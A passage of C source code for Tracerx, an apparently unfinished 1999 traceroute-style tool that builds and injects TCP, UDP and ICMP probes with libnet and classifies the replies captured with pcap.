tx_packet_inject(tx_c);
fprintf(stderr, ".");
}
tx_packet_update_probe(tx_c);
fprintf(stderr, "\n");
}
tx_error(FATAL, "Hopcount exceeded.\n");
return (1);
}
int
tx_shutdown(struct tx_control **tx_c)
{
pcap_close((*tx_c)->p);
libnet_close_link_interface((*tx_c)->l);
free((*tx_c)->l);
libnet_destroy_packet(&(*tx_c)->tx_packet);
free(*tx_c);
}
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_build.c !3b3527d5
/*
* $Id: tx_packet_build.c,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_packet_build.c - tracerx packet construction routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_main.h"
#include "./tx_error.h"
#include "./tx_struct.h"
#include "./tx_framework.h"
#include "./tx_packet_inject.h"
#include "./tx_packet_capture.h"
int
tx_packet_build_probe(struct tx_control **tx_c)
{
int i, c;
u_char errbuf[BUFSIZ];
struct ether_addr *local_mac, *remote_mac;
u_char DEBUG_ETHER[6] = {0x00, 0x10, 0x4b, 0x6b, 0x3c, 0x16};
/*
* Get the link layer addresses we'll need -- the local address of the
* outgoing interface and remote address of the host in question (this
* will actually be the first hop router).
*/
c = tx_get_hwaddrs(&local_mac, &remote_mac, tx_c, errbuf);
if (c == -1)
{
tx_error(FATAL, "tx_get_hwaddrs could not get an address %s.\n",
errbuf);
}
/*
* Build the ethernet header portion of the packet.
*/
libnet_build_ethernet(DEBUG_ETHER/*remote_mac.ether_addr_octet*/,
local_mac->ether_addr_octet,
ETHERTYPE_IP, /* This is an IP packet */
NULL, /* No payload */
0, /* No payload */
(*tx_c)->tx_packet); /* packet memory */
/*
* Build the IP header portion of the packet.
*/
libnet_build_ip((*tx_c)->packet_size - IP_H, /* IP packetlength */
(*tx_c)->ip_tos, /* IP type of service */
(*tx_c)->id, /* IP id */
(*tx_c)->ip_df, /* IP fragmentation bits */
(*tx_c)->current_ttl, /* IP time to live */
(*tx_c)->protocol, /* transport protocol */
(*tx_c)->sin.sin_addr.s_addr, /* source IP address */
(*tx_c)->host, /* destination IP */
NULL, /* IP payload */
0, /* IP payload size */
(*tx_c)->tx_packet + ETH_H); /* packet memory */
/*
* Build the transport header and payload portion of the packet.
*/
switch ((*tx_c)->protocol)
{
case IPPROTO_UDP:
tx_packet_build_udp(tx_c);
break;
case IPPROTO_TCP:
tx_packet_build_tcp(tx_c);
break;
case IPPROTO_ICMP:
tx_packet_build_icmp(tx_c);
break;
default:
tx_error(FATAL, "Unknown transport protocol\n");
}
libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_IP, IP_H);
}
int
tx_packet_build_udp(struct tx_control **tx_c)
{
libnet_build_udp((*tx_c)->initial_sport, /* source UDP port */
(*tx_c)->initial_dport, /* dest UDP port */
NULL, /* payload (copied later) */
/* The UDP header needs to know the payload size. */
(*tx_c)->packet_size - IP_H - UDP_H,
(*tx_c)->tx_packet + ETH_H + IP_H); /* packet memory */
tx_packet_build_payload(tx_c, UDP_H);
libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_UDP,
(*tx_c)->packet_size - IP_H);
}
int
tx_packet_build_tcp(struct tx_control **tx_c)
{
libnet_build_tcp((*tx_c)->initial_sport, /* source TCP port */
(*tx_c)->initial_dport, /* dest TCP port */
libnet_get_prand(PRu32), /* sequence number */
0L, /* ACK number */
TH_SYN, /* control flags */
1024, /* window size */
0, /* urgent */
NULL, /* payload (do this later) */
0, /* later */
(*tx_c)->tx_packet + ETH_H + IP_H); /* packet memory */
tx_packet_build_payload(tx_c, TCP_H);
libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_TCP,
(*tx_c)->packet_size - IP_H);
}
int
tx_packet_build_icmp(struct tx_control **tx_c)
{
libnet_build_icmp_echo(ICMP_ECHO,
0,
0,
0,
NULL,
0,
(*tx_c)->tx_packet + ETH_H + IP_H);
tx_packet_build_payload(tx_c, ICMP_ECHO_H);
libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_ICMP,
(*tx_c)->packet_size - IP_H);
}
int
tx_packet_build_payload(struct tx_control **tx_c, int p_hdr_size)
{
struct timeval time0;
struct tx_payload *p;
struct libnet_ip_hdr *ip_hdr;
int payload_offset;
/*
* The payload is just beyond the transport header.
*/
payload_offset = ETH_H + IP_H + p_hdr_size;
if (gettimeofday(&time0, NULL) == -1)
{
tx_error(FATAL, "Can't get timing information\n");
}
ip_hdr = (struct libnet_ip_hdr *)((*tx_c)->tx_packet + ETH_H);
p = (struct tx_payload *)((*tx_c)->tx_packet + payload_offset);
/*
* This field is pretty much deprecated since we can keep track of
* packets by controlling the ip_id field, something traceroute could
* not do.
*/
p->seq = 0;
/*
* TTL packet left with.
*/
p->ttl = ip_hdr->ip_ttl;
/*
* RTT information.
*/
p->tv = time0;
}
int
tx_packet_update_probe(struct tx_control **tx_c)
{
struct libnet_ip_hdr *ip_hdr;
ip_hdr = (struct libnet_ip_hdr *)((*tx_c)->tx_packet + ETH_H);
/*
* Tracerx wouldn't be tracerx without a monotonically increasing IP
* TTL.
*/
ip_hdr->ip_ttl++;
switch ((*tx_c)->protocol)
{
case IPPROTO_TCP:
{
struct libnet_tcp_hdr *tcp_hdr;
tcp_hdr = (struct libnet_tcp_hdr *)((*tx_c)->tx_packet + ETH_H
+ IP_H);
if (!((*tx_c)->tx_flags & TX_STATIC_PORTS))
{
/*
* Increment destination port.
*/
tcp_hdr->th_dport = htons(ntohs(tcp_hdr->th_dport) + 1);
}
/*
* Update the payload information.
*/
tx_packet_build_payload(tx_c, TCP_H);
tcp_hdr->th_sum = 0;
libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_TCP,
(*tx_c)->packet_size - IP_H);
break;
}
case IPPROTO_UDP:
{
struct libnet_udp_hdr *udp_hdr;
udp_hdr = (struct libnet_udp_hdr *)((*tx_c)->tx_packet + ETH_H
+ IP_H);
if (!((*tx_c)->tx_flags & TX_STATIC_PORTS))
{
/*
* Increment destination port.
*/
udp_hdr->uh_dport = htons(ntohs(udp_hdr->uh_dport) + 1);
}
/*
* Update the payload information.
*/
tx_packet_build_payload(tx_c, UDP_H);
udp_hdr->uh_sum = 0;
libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_UDP,
(*tx_c)->packet_size - IP_H);
break;
}
case IPPROTO_ICMP:
{
struct libnet_icmp_hdr *icmp_hdr;
icmp_hdr = (struct libnet_icmp_hdr *)((*tx_c)->tx_packet + ETH_H
+ IP_H);
/*
* Update the payload information.
*/
tx_packet_build_payload(tx_c, ICMP_ECHO_H);
icmp_hdr->icmp_sum = 0;
libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_ICMP,
(*tx_c)->packet_size - IP_H);
break;
}
default:
tx_error(FATAL, "Unknown transport protocol\n");
}
ip_hdr->ip_sum = 0;
libnet_do_checksum((*tx_c)->tx_packet + ETH_H, IPPROTO_IP, IP_H);
}
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_inject.c !788114b0
/*
* $Id: tx_packet_inject.c,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_packet_inject.c - high-level packet injection routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_struct.h"
#include "./tx_framework.h"
#include "./tx_error.h"
int
tx_packet_inject(struct tx_control **tx_c)
{
int n;
n = libnet_write_link_layer(
(*tx_c)->l, /* pointer to the link interface */
(*tx_c)->device, /* the device to use */
(*tx_c)->tx_packet, /* the packet to inject */
(*tx_c)->packet_size + ETH_H); /* total packet size */
if (n != (*tx_c)->packet_size + ETH_H)
{
tx_error(CRITICAL, "Write error. Only wrote %d bytes\n", n);
}
}
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_verify.c !7f21675e
/*
* $Id$
*
* Tracerx
* tx_packet_verify.c - packet verification routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_struct.h"
#include "./tx_framework.h"
#include "./tx_error.h"
#include "./tx_packet_capture.h"
int
tx_packet_verify_udp(char *packet, struct tx_control **tx_c)
{
struct libnet_ip_hdr *ip_hdr;
struct libnet_icmp_hdr *icmp_hdr;
ip_hdr = (struct libnet_ip_hdr *)(packet + ETH_H);
/*
* A UDP scan is only interested in ICMP packets (or possibly a UDP
* packet -- terminal case only).
*/
if (ip_hdr->ip_p != IPPROTO_ICMP && ip_hdr->ip_p != IPPROTO_UDP)
{
return (TX_PACKET_IS_BORING);
}
icmp_hdr = (struct libnet_icmp_hdr *)(packet + ETH_H + IP_H);
switch (icmp_hdr->icmp_type)
{
case ICMP_UNREACH:
{
struct libnet_ip_hdr *o_ip_hdr;
if (ip_hdr->ip_src.s_addr == (*tx_c)->host)
{
/*
* This is an unreachable packet from our destination host.
* This has to be the terminal packet. The report module
* will need to know if it's a regular port unreachable
* message or perhaps some other type of unreachable..
*/
if (icmp_hdr->icmp_code == ICMP_UNREACH_PORT)
{
return (TX_PACKET_IS_TERMINAL);
}
else
{
return (TX_PACKET_IS_TERMINAL_EXOTIC);
}
}
/*
* Point to the original IP header inside the ICMP message's
* payload.
*/
o_ip_hdr = (struct libnet_ip_hdr *)(packet + ETH_H + IP_H +
ICMP_UNREACH_H);
if (ntohs(o_ip_hdr->ip_id) == (*tx_c)->id &&
o_ip_hdr->ip_src.s_addr ==
(*tx_c)->sin.sin_addr.s_addr)
{
/*
* The original IP header was sent by this host and contains
* our special ID field, so it's almost positively ours.
*/
return (TX_PACKET_IS_UNREACH_EN_ROUTE);
}
else
{
return (TX_PACKET_IS_BORING);
}
break;
}
case ICMP_TIMXCEED:
break;
default:
return (TX_PACKET_IS_BORING);
}
}
int
tx_packet_verify_tcp(char *packet, struct tx_control **tx_c)
{
}
int
tx_packet_verify_icmp(char *packet, struct tx_control **tx_c)
{
}
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_filter.c !df1a0488
/*
* $Id: tx_packet_filter.c,v 1.1 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_packet_filter.c - packet filtering routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_struct.h"
#include "./tx_error.h"
#include "./tx_main.h"
#include "./tx_packet_filter.h"
int
tx_set_pcap_filter(char *filter, struct tx_control **tx_c)
{
struct bpf_program filter_code;
bpf_u_int32 local_net, netmask;
char err_buf[BUFSIZ];
/*
* We need the subnet mask to apply a filter.
*/
if (pcap_lookupnet((*tx_c)->device, &local_net, &netmask, err_buf) == -1)
{
tx_error(CRITICAL, "pcap_lookupnet: ", err_buf);
return (-1);
}
/*
* Compile the filter into bpf machine code.
*/
if (pcap_compile((*tx_c)->p, &filter_code, filter, 1, netmask) == -1)
{
tx_error(CRITICAL, "pcap_compile failed for some reason\n");
sprintf(err_buf, "unknown error\n");
return (-1);
}
/*
* Compile the filter into bpf machine code.
*/
if (pcap_setfilter((*tx_c)->p, &filter_code) == -1)
{
tx_error(CRITICAL, "pcap_setfilter: ", err_buf);
return (-1);
}
return (1);
}
/* EOF */
<-->
<++> P55/Tracerx/tx_packet_capture.c !27092cf6
/*
* $Id: tx_packet_capture.c,v 1.2 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_packet_capture.c - high-level packet capturing routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_struct.h"
#include "./tx_framework.h"
#include "./tx_error.h"
#include "./tx_packet_capture.h"
int
tx_packet_snatcher(struct tx_control **tx_c)
{
int n;
u_char *packet;
struct pcap_pkthdr pc_hdr;
/*
* Temporary looping construct until parallel code is in place.
*/
for (; packet = (u_char *)pcap_next((*tx_c)->p, &pc_hdr); )
{
/*
* Submit packet for verification based on scan type.
*/
switch ((*tx_c)->protocol)
{
case IPPROTO_UDP:
n = tx_packet_verify_udp(packet, tx_c);
break;
case IPPROTO_TCP:
n = tx_packet_verify_tcp(packet, tx_c);
break;
case IPPROTO_ICMP:
n = tx_packet_verify_icmp(packet, tx_c);
break;
}
/*
* Process the response from the verifier.
*/
switch (n)
{
case -1:
/* an error occured */
case TX_PACKET_IS_BORING:
/* not something we are not interested in */
break;
case TX_PACKET_IS_EXPIRED:
tx_report(TX_PACKET_IS_EXPIRED, packet, tx_c);
break;
case TX_PACKET_IS_TERMINAL:
tx_report(TX_PACKET_IS_TERMINAL, packet, tx_c);
break;
case TX_PACKET_IS_TERMINAL_EXOTIC:
tx_report(TX_PACKET_IS_TERMINAL_EXOTIC, packet, tx_c);
break;
case TX_PACKET_IS_UNREACH_EN_ROUTE:
tx_report(TX_PACKET_IS_UNREACH_EN_ROUTE, packet, tx_c);
break;
default:
break;
}
}
}
/* EOF */
<-->
<++> P55/Tracerx/tx_main.c !831e8153
/*
* $Id: tx_main.c,v 1.3 1999/06/03 22:06:52 route Exp $
*
* Tracerx
* tx_main.c - main control logic
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_main.h"
#include "./tx_util.h"
#include "./version.h"
#include "./tx_struct.h"
#include "./tx_error.h"
#include "./tx_framework.h"
int
main(int argc, char *argv[])
{
int c,
have_protocol; /* Mediates combined usage of -I and -P */
u_char err_buf[BUFSIZ];
struct tx_control *tx_c;
/*
* Need to be root to open link layer devices.
*/
if (geteuid() && getuid())
{
tx_error(FATAL, "Pony up the privledgez (UID or EIUD == 0).\n");
}
/*
* Initialize control structure. This structure is used by just about
* every function in the program.
*/
if (tx_init_control(&tx_c) == -1)
{
tx_error(FATAL, "tx_init_control %s\n", strerror(errno));
}
/*
* Process commandline arguments.
*/
have_protocol = 0;
while ((c = getopt(argc, argv, "dFHhInrvxf:g:i:m:P:p:q:Ss:t:w:Vv")) != EOF)
{
switch (c)
{
case 'b':
/* Select burst rate */
tx_c->burst_rate = tx_str2int(optarg, "burst rate", 1,
BURST_RATE_MAX);
case 'D':
/* Set base TCP/UDP destination port number */
tx_c->initial_dport = tx_str2int(optarg, "initial dest port",
1, PORT_MAX);
break;
case 'd':
/* Socket level debugging (SO_DEBUG) */
/* NOOP */
break;
case 'F':
/* Set IP_DF (don't fragment) bit */
tx_c->ip_df = IP_DF;
break;
case 'f':
/* Set initial (first) IP TTL */
tx_c->current_ttl = tx_str2int(optarg, "initial TTL", 1,
IP_TTL_MAX);
break;
case 'g':
/* Loose source routing */
/* NOOP */
break;
case 'H':
/* Verbose help */
/* WRITEME */
case 'h':
/* Help */
usage(argv[0]);
case 'I':
/* Use ICMP */
/* Set transport protocol and transport header size */
/* Overruled by -P */
if (!have_protocol)
{
tx_c->protocol = tx_prot_select("ICMP", &tx_c);
}
break;
case 'i':
/* Interface */
tx_c->device = optarg;
break;
case 'm':
/* Max IP TTL */
tx_c->max_ttl = tx_str2int(optarg, "max TTL", 1,
IP_TTL_MAX);
break;
case 'n':
/* Do not resolve hostnames */
tx_c->use_name = 0;
break;
case 'P':
/* Set transport protocol and transport header size */
/* (supercedes -I) */
tx_c->protocol = tx_prot_select(optarg, &tx_c);
have_protocol = 1;
break;
case 'p':
/* Set base TCP/UDP destination port number */
tx_c->initial_dport = tx_str2int(optarg, "initial dest port",
1, PORT_MAX);
break;
case 'q':
/* Number of probes (queries) */
tx_c->probe_cnt = tx_str2int(optarg, "probe cnt", 1,
PROBE_MAX);
break;
case 'r':
/* Bypass routing sockets */
/* NOOP */
break;
case 'S':
/* Do not increment TCP/UDP port numbers (static) */
tx_c->tx_flags |= TX_STATIC_PORTS;
break;
case 's':
/* Set base TCP/UDP source port number */
tx_c->initial_sport = tx_str2int(optarg, "initial source port",
1, PORT_MAX);
break;
case 't':
/* Set IP_TOS (type of service) bits */
tx_c->ip_tos = tx_str2int(optarg, "IP tos", 0, 255);
break;
case 'V':
/* Version information */
fprintf(stderr, "\n%s\nversion %s\n", BANNER, version);
exit(EXIT_SUCCESS);
case 'v':
/* Verbose output */
tx_c->verbose = 1;
break;
case 'x':
/* Toggle checksums */
/* NOOP */
break;
case 'w':
/* Time to wait (in seconds) */
tx_c->reading_wait = tx_str2int(optarg, "read wait", 2,
WAIT_MAX);
break;
default:
usage(argv[0]);
}
}
/*
* Parse the command line for the destination host and possible
* packetlength.
*/
switch (argc - optind)
{
case 2:
/*
* User specified packetlength (optional). This will later
* be verified and adjusted if necessary.
*/
tx_c->packet_size = tx_str2int(argv[optind + 1], "packet length",
PACKET_MIN, PACKET_MAX);
/* FALLTHROUGH */
case 1:
/* Host (required). */
tx_c->host = libnet_name_resolve(argv[optind], 1);
if (tx_c->host == -1)
{
tx_error(FATAL, "Cannot resolve host IP address\n");
}
break;
default:
usage(argv[0]);
}
/*
* Bring up the network components.
*/
if (tx_init_network(&tx_c, err_buf) == -1)
{
tx_error(FATAL, "Cannot initialize the network: %s\n", err_buf);
}
/*
* Start the game!
*/
tx_do_scan(&tx_c);
/*
* Stop the game!
*/
tx_shutdown(&tx_c);
return (EXIT_SUCCESS);
}
void
usage(char *argv0)
{
fprintf(stderr,
"\nUsage : %s [options] host [packetlength]\n"
"\t\t [-b] burst rate\n"
"\t\t [-F] IP_DF\n"
"\t\t [-f] base IP TTL\n"
"\t\t [-g] loose source routing\n"
"\t\t [-H] verbose help\n"
"\t\t [-h] help\n"
"\t\t [-I] use ICMP\n"
"\t\t [-i] specify interface\n"
"\t\t [-m] max IP TTL (hopcount)\n"
"\t\t [-n] do not resolve IP addresses into hostnames\n"
"\t\t [-P] transport protocol (supercedes -I)\n"
"\t\t [-p] base TCP/UDP port number (destination)\n"
"\t\t [-q] number of probes\n"
"\t\t [-S] do not increment TCP/UDP port numbers (static)\n"
"\t\t [-s] base TCP/UDP port number (source)\n"
"\t\t [-t] IP TOS\n"
"\t\t [-V] version information\n"
"\t\t [-v] verbose output\n"
"\t\t [-w] wait (in seconds)\n"
"\n", argv0);
exit(EXIT_FAILURE);
}
/* EOF */
<-->
<++> P55/Tracerx/tx_report.c !04c69fdd
/*
* $Id: tx_report.c,v 1.1.1.1 1999/05/28 23:55:06 route Exp $
*
* Tracerx
* tx_report.c - reporting and printing module
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
*/
#if (HAVE_CONFIG_H)
#include "./config.h"
#endif
#include "./tx_struct.h"
#include "./tx_packet_capture.h"
void
tx_report(int class, u_char *packet, struct tx_control **tx_c)
{
switch (class)
{
case TX_PACKET_IS_EXPIRED:
break;
case TX_PACKET_IS_TERMINAL:
break;
case TX_PACKET_IS_UNREACH_EN_ROUTE:
break;
default:
break;
}
}
/* EOF */
<-->
<++> P55/Tracerx/tx_util.c !29dd0492
/*
* $Id: tx_util.c,v 1.2 1999/05/29 20:28:43 route Exp $
*
* Tracerx
* tx_util.c - various routines
*
* Copyright (c) 1999 Mike D. Schiffman <mike@infonexus.com>
* Jeremy F. Rauch <jrauch@cadre.org>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
